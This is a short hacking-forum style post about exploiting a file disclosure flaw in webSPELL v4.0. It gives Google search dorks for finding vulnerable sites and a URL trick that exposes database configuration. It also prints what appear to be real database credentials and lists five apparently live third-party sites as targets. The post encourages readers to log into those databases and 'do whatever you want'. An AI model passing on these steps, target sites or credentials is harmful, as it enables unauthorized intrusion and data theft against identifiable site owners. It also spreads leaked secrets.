Configre WebShell Remotely with Webspell v4.0 exploits

Hey friends Found a new webShell 4.0 exploits to mess with database

Its URL will just look like this

vulnerable url : http://website.com/picture.php?file=_mysql.php

Ok Let me tell you more on this Google Dork(just simply go to google.com search for the string below)For this is

Dorks : ext:php intitle:webSPELL v4.0
"inurl:/picture.php?file="

Find vulnerable website and goto http://website.com/picture.php?file=_mysql.php
you'll get a Blanck Page
press ctrl+U and view source
you'll find something like this

{php}evaL(base64_decode(')<?php $host = "localhost"; $user = "db95228_7"; $pwd = "zappel0815street"; $db = "db95228_7"; define(PREFIX, 'webs_'); ?>

Now simply connect to database and do whatever you want

Live demo :

http://www.echoes-guild.com/picture.php?file=_mysql.php
http://www.crazyfungamer.de/picture.php?file=_mysql.php
http://www.dj-pedrofernandez.de/cgi//picture.php?file=_mysql.php
http://r0fld2.uw.hu/picture.php?file=_mysql.php
http://www.street.clanfusion.de/picture.php?file=_mysql.php

I hope you like my this post